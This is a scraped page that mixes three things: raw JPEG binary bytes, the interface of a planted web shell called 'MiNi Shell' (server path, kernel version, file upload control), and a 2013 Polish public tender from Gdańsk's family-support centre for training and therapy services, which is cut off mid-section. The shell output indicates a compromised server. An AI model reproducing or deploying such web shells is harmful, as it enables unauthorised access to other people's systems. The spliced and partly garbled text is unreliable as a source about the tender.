JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130211/21269-N-2013.html

<p class="kh_header"><b>Gdańsk: Świadczenie usługi szkoleniowej na terenie miasta Gdańska dla beneficjentów projektu Systematycznie do celu (Program Operacyjny Kapitał Ludzki 2007 - 2013; Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1), w zakresie diagnozy społeczno - zawodowej, treningu umiejętności społecznych, treningu umiejętności zawodowych, treningu umiejętności wychowawczych (w tym Szkoła dla Rodzica), treningu umiejętności budżetowych, grupy wsparcia, terapii z podnoszenia samooceny i wiary  we własne możliwości, specjalistycznego treningu rodzin, szkolenia nt. wolontariatu, prawa, terapii indywidualnej, coachin</b><br>
<b>Numer ogłoszenia: 21269 - 2013; data zamieszczenia: 11.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Gdańsku , ul. Konrada Leczkowa 1A, 80-432 Gdańsk, woj. pomorskie, tel. 58 3423150, faks 58 3423151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi szkoleniowej na terenie miasta Gdańska dla beneficjentów projektu Systematycznie do celu (Program Operacyjny Kapitał Ludzki 2007 - 2013; Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1), w zakresie diagnozy społeczno - zawodowej, treningu umiejętności społecznych, treningu umiejętności zawodowych, treningu umiejętności wychowawczych (w tym Szkoła dla Rodzica), treningu umiejętności budżetowych, grupy wsparcia, terapii z podnoszenia samooceny i wiary  we własne możliwości, specjalistycznego treningu rodzin, szkolenia nt. wolontariatu, prawa, terapii indywidualnej, coachin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla 106 osób, zorganizowanie zajęć opiekuńczo - edukacyjnych dla dzieci, zapewnienie cateringu  w ramach projektu systemowego Systematycznie                         do celu. Projekt realizowany jest  przez Miejski Ośrodek Pomocy Rodzinie w Gdańsku i jest współfinansowany                           ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
2. Przedmiot zamówienia obejmuje termin szkoleń od marca 2013 do 20 września 2013 roku w salach wskazanych                               i wynajmowanych przez MOPR w Gdańsku, a przypadku Specjalistycznego Treningu Rodzin w salach zapewnionych przez Wykonawcę - teren Miasto Gdańsk, dzielnica Wrzeszcz. Termin obowiązywania umowy od marca 2013 do 30 września 2013 roku.
Zadanie dotyczy beneficjentów z grup: BO 1, BO 2, BO 7, a także beneficjentów wskazanych przez Zleceniodawcę. 
Usługi szkoleniowe świadczone są w zakresie: diagnozy społeczno - zawodowej, treningu umiejętności społecznych, treningu umiejętności zawodowych, treningu umiejętności wychowawczych (w tym Szkoła dla Rodzica), treningu umiejętności budżetowych, grupy wsparcia, terapii z podnoszenia samooceny i wiary  we własne możliwości, specjalistycznego treningu rodzin, szkolenia nt. wolontariatu, prawa, terapii indywidualnej, coachingu, doradztwa zawodowego, profilaktyki zdrowia, pierwszej pomocy.
BO 1 Rodziny w pogotowiu- 6 osób
Opis grupy: rodzice podopiecznych skierowanych w oparciu o postanowienie sądu rodzinnego do placówki interwencyjnej, rokujący na przejęcie stałej opieki nad swoimi dziećmi bez konieczności zapewniania dalszej opieki instytucjonalnej. Osoby te mają zróżnicowany status socjoekonomiczny, osoby te wymagają pomocy i ukierunkowania działań opiekuńczo- wychowawczych i edukacyjnych, wsparcia w pokonywaniu trudności komunikacyjnych w rodzinie, a także zaktywizowania zawodowego oraz w przezwyciężeniu barier indywidualnych.
Cel pracy z grupą: poprawa funkcjonowania osób i rodzin zmierzająca do usamodzielnienia w sferze opiekuńczo wychowawczej, zawodowej, społecznej oraz integracji ze środowiskiem lokalnym.
BO 2 Asystent rodziny - 80 osób
Opis grupy: osoby z rodzin dysfunkcyjnych, niewydolnych w sprawach opiekuńczo- wychowawczych i prowadzeniu gospodarstwa domowego, długotrwale korzystające z systemu pomocy społecznej, rodzin niepełnych i wielodzietnych, w których istnieje duże zagrożenie objęciem opieki zastępczej dzieci, rodzin z problemem bezrobocia, ubóstwa. 
Cel pracy z grupą: poprawa funkcjonowania osób i rodzin zmierzająca do usamodzielnienia w sferze opiekuńczo wychowawczej, zawodowej, społecznej oraz integracji ze środowiskiem lokalnym.
BO 7 Mam marzenie
Opis grupy: 20 osób: młodzież w wieku 18-24, usamodzielniający się wychowankowie rodzin zastępczych oraz placówek opiekuńczo - wychowawczych, pochodzące z rodzin ubogich oraz ze środowisk zagrożonych demoralizacją. Są to osoby zagrożone wykluczeniem społecznym w tym młode matki.
Cel pracy z grupą: rozwijanie aktywnych form integracji społecznej i zawodowej oraz umożliwienie dostępu do nich ww. beneficjentom, wyrównanie szans na rynku pracy, wsparcie w procesie usamodzielniania.
TERAPIA Z PODNOSZENIA SAMOOCENY I WIARY WE WŁASNE MOŻLIWOŚCI:
Opis grupy: terapią zostaną objęte 24 kobiety, wybrane z różnych grup BO. Osoby te mają trudności w funkcjonowaniu psychospołecznym.
Celem terapii jest podniesienie jakości życia i komfortu funkcjonowania na co dzień, podniesienia poczucia własnej wartości, samooceny, samoakceptacji. 
SPECJALISTYCZNY TRENING RODZIN
Opis grupy: treningiem zostanie objętych 40 rodzin z różnych grup BO. Rodziny te mają trudności w funkcjonowaniu psychospołecznym, treningiem objęta jest cała rodzina zarówno rodzice/opiekunowie jak i dzieci.
Celem treningu jest poprawa funkcjonowania osób i rodzin zmierzająca do usamodzielnienia w sferze opiekuńczo wychowawczej, społecznej oraz przygotowanie  do pełnego uczestnictwa w życiu społecznym.
DIAGNOZA SPOŁECZNO-ZAWODOWA, INDYWIDUALNY PLAN DZIAŁANIA
Opis grupy: 100 osób z grupy BO 1, 2, 7.
Cel pracy z beneficjentami: sporządzenie diagnozy społeczno - zawodowej dostosowania kursów zawodowych                          do indywidualnych potrzeb beneficjentów.
DORADZTWO ZAWODOWE
Opis grupy: 25 osób, wybrani beneficjenci z grup BO 1, 2, 7, którzy utracili pracę  i chcą po dłuższej lub krótszej przerwie wrócić do pracy, bądź z przyczyn niezależnych od nich muszą zmienić swój dotychczasowy wyuczony zawód.
Cel pracy z beneficjentami: wytyczenie ścieżki edukacyjnej i/lub zawodowej beneficjenta (przygotowanie Indywidualnego Planu Działania - zaplanowanie konkretnych kroków kariery zawodowej).
TERAPIA INDYWIDUALNA
Opis grupy: terapią zostanie objętych ok. 15 osób, wybrani beneficjenci z grup BO 1, 2, 7, mający trudności                                       w funkcjonowaniu psychospołecznym.
Celem terapii jest zrozumienie problemów z jakimi przychodzi beneficjent oraz zmiany emocjonalnego nastawienia wobec siebie i innych. Zrozumienie emocjonalne i intelektualne osiągane jest przez uświadomienie sobie swoich trudności powstałych w toku całego doświadczenia życiowego.
Coaching 
Opis grupy: coachingiem zostanie objętych ok. 50 osób, wybrani beneficjenci z grup BO 1, 2, 7, oraz beneficjenci wskazani przez Zleceniodawcę, mający trudności w określeniu indywidualnej ścieżki życiowo/zawodowej.
Cel pracy z grupą:  Wsparcie w procesie rozwoju i zmiany beneficjenta, wyznaczenie celu i planu działania, monitorowanie postępów, ocena rezultatów poszczególnych spotkań i procesu coachingu. Proces skoncentrowany                          na celach, które klient samodzielnie określa przy wsparciu Coacha. Inspirowanie beneficjenta do brania odpowiedzialności  za przedstawienia własnych potrzeb, celów, wartości, jak również sposobów ich realizacji
LETNIA SZKOŁA DLA RODZICA
Opis grupy: Projekt Letnia szkoła dla rodzica adresowany jest do rodzin klientów MOPR w Gdańsku, którzy zainteresowani są zwiększeniem wiedzy i umiejętności rodziców w zakresie prawidłowego rozwoju psychofizycznego dziecka, jego potrzeb i relacji w rodzinie oraz zapobieganie niedostosowaniu społecznemu dzieci poprzez ofertę atrakcyjnego spędzania czasu wolnego  w połączeniu z edukacją i wsparciem rodziców. 
Cel pracy z grupą: poprawa kompetencji rodzicielskich, relacji wewnątrzrodzinnych, zmiana postaw i negatywnych zachowań.
JESIENNA SZKOŁA ZATRUDNIENIA - SZKOLENIE WYJAZDOWE
Opis grupy: Projekt Jesienna Szkoła Zatrudnienia adresowany jest do 30 osób - klientów MOPR  w Gdańsku silnie zmotywowanych do podjęcia zatrudnienia. Wyboru  beneficjentów dokonają trenerzy prowadzący zajęcia z TUZ i TUS w ścisłej współpracy z pracownikami biura. Beneficjenci z różnych grup BO, którzy utracili pracę i chcą                           po dłuższej lub krótszej przerwie wrócić do pracy, bądź z przyczyn niezależnych od nich muszą zmienić swój dotychczasowy wyuczony zawód.
Cel pracy z grupą: przygotowanie do podjęcia pracy przez beneficjenta.
3. Godzina zegarowa kursu liczy 60 min. Trzygodzinny blok szkoleniowy obejmuje 2 przerwy po 10 min. każda. Dwugodzinny blok szkoleniowy obejmuje jedną przerwę trwającą 15 minut. Spotkania indywidualne trwają 60 min (lub 1,5h diagnoza, terapia rodzin, szkolenie nt. wolontariatu) bez przerwy.
4.	Zajęcia grupowe odbywają się maksymalnie 2 razy w tygodniu, maksymalnie 3 godziny dziennie (za wyjątkiem szkoleń wyjazdowych).
5.	Szkolenia grupowe muszą odbywać się różnymi metodami i technikami np.: warsztaty, dyskusja, burza mózgów, mini wykład, praca indywidualna i w grupach, omówienie ćwiczeń na forum grupy, pomoce wizualne, pokazy                                i demonstracje, pytania i odpowiedzi. Diagnozowanie predyspozycji zawodowych odbywać się musi min. poprzez metody testowe.
6.	Zamawiający zastrzega sobie prawo do zmiany ilości edycji szkoleń. Szczegółowy harmonogram zajęć będzie ustalony z Wykonawcą przed podpisaniem umowy i zaakceptowany przez MOPR  w Gdańsku w dniu podpisania umowy.
7.	Celem szkolenia jest zwiększenie aktywności społeczno-zawodowej beneficjentów projektu zagrożonych wykluczeniem społecznym będących w wieku aktywności zawodowej oraz przygotowanie ich do pełnego uczestnictwa w życiu społecznym i zawodowym.
8.	Każdy blok szkoleniowy zajęć grupowych musi zakończyć się wydaniem stosownego zaświadczenia o ukończeniu bloku szkoleniowego z informacją dotyczącą współfinansowania szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i musi zawierać obowiązujące logotypy dostępne w biurze projektu. Wzór zaświadczenia musi być przedłożony do akceptacji MOPR w Gdańsku w ciągu 10 dni po podpisaniu umowy. Każdy blok szkoleniowy zajęć grupowych musi zakończyć się spotkaniem podsumowującym z wręczeniem zaświadczenia                        o ukończeniu szkolenia.
9.	Wykonawca zapewni wszystkim uczestnikom przed każdym blokiem szkoleniowym harmonogram szkolenia                                 i materiały dydaktyczne w formie papierowej, przygotuje prezentacje multimedialne zgodne z tematyką szkolenia oraz przed każdym spotkaniem będzie informować beneficjentów o tym, że szkolenia są organizowane przez Miejski Ośrodek Pomocy Rodzinie w Gdańsku  i są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Wszystkie materiały dydaktyczne muszą być przekazane uczestnikom w dniu rozpoczęcia danego bloku szkoleniowego. Wykonawca przeniesie na Zamawiającego prawa autorskie  do materiałów dydaktycznych przygotowanych przez niego do celów realizacji szkolenia będące przedmiotem niniejszego zamówienia. 

Przedmiot zamówienia obejmuje również:
1.	Wykonawca jest zobowiązany przedstawić propozycje kadry o odpowiednim wykształceniu i doświadczeniu                             w prowadzeniu szkoleń i pozostałych zajęć, zgodnie  z wykazem stanowiącym załącznik do oferty. 
2.	Osoby prowadzące zajęcia muszą posiadać na zajęciach dokument potwierdzający tożsamość oraz identyfikatory zawierające imię nazwisko osoby prowadzącej zajęcia oraz logotypy zgodnie  z wytycznymi PO KL.
3.	Oznakowanie wszystkich prezentacji multimedialnych, materiałów szkoleniowych, list obecności, list odbioru cateringu, zaświadczeń, sprawozdań, zestawień, pism itp., poprzez umieszczenia logotypów według Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, które są dostępne w biurze projektu.
4.	Informowanie uczestników szkoleń, iż szkolenia organizowane są przez Miejski Ośrodek Pomocy Rodzinie                                w Gdańsku i współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
5.	W wyjątkowych sytuacjach Zamawiający dopuszcza wymianę i/lub dodanie kadry na osoby  o kwalifikacjach zgodnych z zapisami w SIWZ (wymiana i/lub dodanie kadry dotyczy maksymalnie 20% kadry przedstawionej w ofercie przetargowej). Wymaga to:
-niezwłocznego uzgodnienia z Zamawiającym, 
-niezwłocznego dostarczenia stosownej informacji i oświadczenia potwierdzającego kwalifikacje nowej osoby przed rozpoczęciem zajęć mailem lub faksem,
-dostarczenia w wersji papierowej stosownej informacji i oświadczenia potwierdzającego kwalifikacje nowej osoby do 5 dni po zgłoszeniu.
W przypadku, gdy MOPR w Gdańsku nie otrzyma ww. informacji, trener nie może przystąpić  do prowadzenia zajęć.
6.	Wyznaczenie osoby do kontaktu z Zamawiającym, odpowiedzialnej za dbałość o wysoką jakość zajęć                                       i upoważnionej do podejmowania wiążących decyzji w kwestiach związanych z realizowanymi szkoleniami. Kontakt                             z pracownikami biura możliwy jest od poniedziałku do piątku w godzinach 07.30-15.30. Kontakt osobisty lub telefoniczny. 
7.	Przygotowanie i prowadzenie dokumentacji kursu, w tym dziennika zajęć edukacyjnych, list obecności, list odbioru cateringu, list odbioru materiałów szkoleniowych, list odbioru zaświadczeń. Wykonawca zobowiązany jest                                       do dostarczenia list obecności w wersji elektronicznej (wg wzoru przekazanego przez Miejski Ośrodek Pomocy Rodzinie  w Gdańsku po podpisaniu umowy) w dzień następny po każdym dniu wykonanego szkolenia, a w wersji papierowej po każdym tygodniu trwania szkolenia do biura projektu.
8.	Umożliwienie przeprowadzenia niezapowiedzianych kontroli realizowanego szkolenia w miejscu ich odbywania przez osobę wyznaczoną przez Zamawiającego i Instytucję Pośredniczącą.
9.	Informacja o ewentualnym odwołaniu lub przesunięciu zajęć (zatwierdzonych harmonogramem) wynikających                           z winy Wykonawcy musi być przekazana do Zamawiającego z 24 godzinnym wyprzedzeniem. Odwołane zajęcia muszą odbyć się w późniejszym terminie.
10.	Każdy uczestnik szkolenia musi otrzymywać sukcesywnie, przed każdym blokiem szkoleniowym:
-harmonogram szkolenia w formie papierowej,
-materiały dydaktyczne w formie papierowej,
Po jednej kopii materiałów dydaktycznych w wersji papierowej i elektronicznej (płyta CD) należy przekazać do biura projektu przed rozpoczęciem każdego bloku szkoleniowego.
11.	Zamawiający zobowiązuje Wykonawcę do udziału wszystkich trenerów w spotkaniu organizacyjnym                                     z pracownikami biura projektu, które odbędzie się  po podpisaniu umowy  a przed rozpoczęciem zajęć.
12.	Każdego dnia trwania trzygodzinnego lub dwugodzinnego bloku szkoleniowego (nie dotyczy szkoleń wyjazdowych), w czasie przerwy, należy zapewnić catering, w skład którego ma wejść:
a)	w przypadku uczestników szkoleń grupowych (dla grup BO 1, BO 2, 7, Terapii z podnoszenia samooceny i wiary                   we własne możliwości): 
-kawa rozpuszczalna (bez ograniczeń),
-kawa sypana (bez ograniczeń),
-herbata (bez ograniczeń),  
-cukier (bez ograniczeń),
-mleko (bez ograniczeń), 
-woda mineralna 0,5 litra/osobę, 
-ciastka kruche (bez ograniczeń), 
-soki (bez ograniczeń),
-1 ciepły posiłek na beneficjenta (drugie danie typu: ziemniaki, kotlet, surówka lub pizza - zależnie od preferencji danej grupy).  
b)	W przypadku dzieci uczestników szkoleń grupowych BO 1, BO 2, Terapii z podnoszenia samooceny i wiary                         we własne możliwości: 
-woda mineralna (bez ograniczeń),
-soki (bez ograniczeń),
-ciastka kruche (bez ograniczeń), 
-jeden ciepły posiłek na dziecko (porcja dziecięca, drugie danie typu: ziemniaki, kotlet, surówka lub pizza) przy założeniu, że będzie w grupie BO 1 - 5 dzieci, BO 2 - 15 dzieci x  4 podgrupy oraz około 20 dzieci w przypadku zajęć                        z Terapii podnoszenia samooceny i wiary we własne możliwości (na całą dwudziestoczteroosobową grupę). 
c) W przypadku Specjalistycznego Treningu Rodzin i sesji coachingowych należy zapewnić catering, w skład którego ma wejść:
-woda mineralna bez ograniczeń, 
Poczęstunek  musi być serwowany na miejscu szkolenia. Nie dopuszcza się, aby uczestnicy szkolenia zostali zaangażowani przez jednostkę szkoleniową do zakupu żywności oraz do sporządzania posiłków konsumowanych                                w czasie przerw.
Wykonawca zapewnia naczynia jednorazowe: talerzyki, sztućce i kubki.
11.	Wykonawca jest zobowiązany pokryć koszty ubezpieczenia NNW wszystkich uczestników szkolenia oraz dzieci zgłoszonych na zajęcia opiekuńczo-edukacyjne w okresie zgodnym  z harmonogramem. Świadczenie podstawowe ubezpieczenia: suma ubezpieczenia z tytułu śmierci 10 000 zł, suma ubezpieczenia z tytułu trwałego uszczerbku                           na zdrowiu 10 000 zł. Świadczenia dodatkowe: wysokość świadczenia z tytułu całkowitego trwałego inwalidztwa 10 000 zł, wysokość świadczenia dodatkowego z tytułu zwrotu kosztów leczenia 3 000 zł, wysokość zwrotu kosztów naprawy/zakupu zniszczonych przedmiotów ortopedycznych i środków pomocniczych 500 zł. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego             ze szkoleniem w drodze do i z miejsca szkolenia. Ubezpieczenie jest ważne do zakończenia realizacji przedmiotu zamówienia, na dowód czego załączy polisę ubezpieczeniową stanowiącą Załącznik nr 6 do umowy.
Miejsce szkolenia: 
1.	Zajęcia muszą odbywać się w salach szkoleniowych wskazanych przez Zamawiającego (za wyjątkiem Specjalistycznego Treningu Rodzin). 
2.	W przypadku Specjalistycznego Treningu Rodzin salę zapewnia  Wykonawca - teren miasto Gdańsk, dzielnica Wrzeszcz. 
3.	Wykonawca zobowiązany jest zapewnić sprzęt audiowizualny, projektor i ekran projekcyjny na zajęciach stacjonarnych. 
4.	W przypadku grup BO 2, Terapii z podnoszenia samooceny i wiary we własne możliwości, zajęć indywidualnych Zamawiający wymaga, aby szkolenie odbywało się  od poniedziałku do piątku w godz. od 09.00  do 18.00 i żeby grupy szkoleniowe były równomiernie rozłożone w ciągu całego dnia.
W przypadku grupy BO 1 Zamawiający wymaga, żeby szkolenia odbywały się od poniedziałku  do piątku w godz. 15.00 do 18.00.
W przypadku grupy BO 7, Zamawiający wymaga, żeby szkolenia odbywały się  od poniedziałku do piątku w godz. 17.00 do 20.00. 
W przypadku Specjalistycznego Treningu Rodzin Zamawiający wymaga, żeby szkolenia odbywały się od poniedziałku do piątku między godz. 16.00 do 19.00. 
W przypadku Letniej Szkoły dla Rodzica Zamawiający wymaga, żeby szkolenie odbyło się  w terminie: 20-21.07.2013 oraz 27-28.07.2013. Zamawiający zapewni trenerowi nocleg  i wyżywienie oraz trener może skorzystać z transportu autokarowego.
W przypadku Jesiennej Szkoły Zatrudnienia Zamawiający wymaga, żeby szkolenie odbyło się w terminie: 6-8.09.2013 Zamawiający zapewni trenerowi nocleg i wyżywienie oraz trener może skorzystać  z transportu autokarowego.
W przepadku szkolenia nt. Wolontariatu, które odbędzie się podczas Letniej Szkoły dla Rodzica w terminach:                                  20-21.07.2013 oraz 27-28.07.2013, a także Jesiennej Szkoły Zatrudnienia w terminie: 6-8.09.2013 dojazd i wyżywienie trenera na miejsce wykonania zadania zapewnia Wykonawca. Ostateczny dzień szkolenia Zleceniodawca przedstawi                    30 dni przed pierwszym planowanym wyjazdem. 
5.	Wykonawca zobowiązany jest do:
a)	dostarczenia list obecności w wersji elektronicznej w dzień następny po każdym dniu wykonanego szkolenia (wzór przekazany będzie przez Miejski Ośrodek Pomocy Rodzinie w Gdańsku po podpisaniu umowy), a w wersji papierowej po każdym tygodniu trwania szkolenia  do biura projektu,
b)	sporządzenia diagnozy społeczno-zawodowej dla wszystkich beneficjentów (w ciągu  14 dni po podpisaniu umowy) i przekazanie dokumentów w wersji papierowej do dnia 12.04.2013 do biura projektu. W przypadku osób, które przyjdą do projektu po tym okresie diagnozę sporządza doradca zawodowy ok. 1,5 godziny na beneficjenta (w ramach                                 25 godzin) i terapeuta indywidualny 1 godzina na beneficjenta (w ramach 30 godzin). W tym przypadku diagnoza                         w wersji papierowej winna być przekazana do biura projektu w terminie 5 dni od dnia ostatniego spotkania z doradcą lub terapeutą,
c)	sporządzenia Indywidualnych Planów Działania dla osób planujących podjąć zatrudnienie, naukę, chcących uczestniczyć w kursach zawodowych. Plany należy przekazać wersji papierowej do dnia 25.04.2013 do biura projektu. W przypadku osób, które przyjdą do projektu po tym okresie Indywidualne Plany Działania sporządza doradca zawodowy przy okazji sporządzenia diagnozy zawodowej. W tym przypadku IPD w wersji papierowej winny być przekazane do biura projektu w terminie 5 dni od dnia ostatniego spotkania   z doradcą,
d)	sporządzenia dla każdego uczestnika zajęć: kart terapii indywidualnej w przypadku terapii indywidualnej, kart konsultacji psychologicznych i kart terapii rodzin w przypadku Specjalistycznego Treningu Rodzin, kart sesji coachingowych oraz kart spotkań z doradcą zawodowym w przypadku doradztwa zawodowego,
e)	sporządzenie zestawienia zbiorczego beneficjentów wytypowanych do uczestnictwa w kursach zawodowych lub wytypowanych do uzupełnienia edukacji i przekazanie zestawienia do biura projektu do 30.04.2013,
f)	sporządzenia sprawozdania podsumowującego z przeprowadzonego cyklu szkoleń na koniec każdego miesiąca oraz            na zakończenie każdego bloku szkoleniowego (w wersji papierowej i elektronicznej). Sprawozdanie powinno zawierać określenie celów: głównego, szczegółowych, podjęte działania i osiągnięte rezultaty (na zajęciach indywidualnych                          i grupowych),
g)	wydrukowania, rozprowadzenia i zebrania ankiet ewaluacyjnych w wersji papierowej po każdym zakończonym bloku szkoleniowym,
h)	podsumowania ankiet w wersji papierowej i elektronicznej (płyta CD) po każdym zakończonym bloku szkoleniowym,
i)	podsumowanie i opracowanie ankiet ewaluacyjnych w formie raportu w wersji papierowej i elektronicznej (płyta CD) na zakończenie całego zadania.
MOPR w Gdańsku przekaże wzór dokumentów po podpisaniu umowy. 

Przy kalkulacji ceny ofertowej należy uwzględnić wszystkie koszty niezbędne do należytego wykonania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 80.56.20.00-1, 85.31.21.10-3, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy nie wnoszą wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
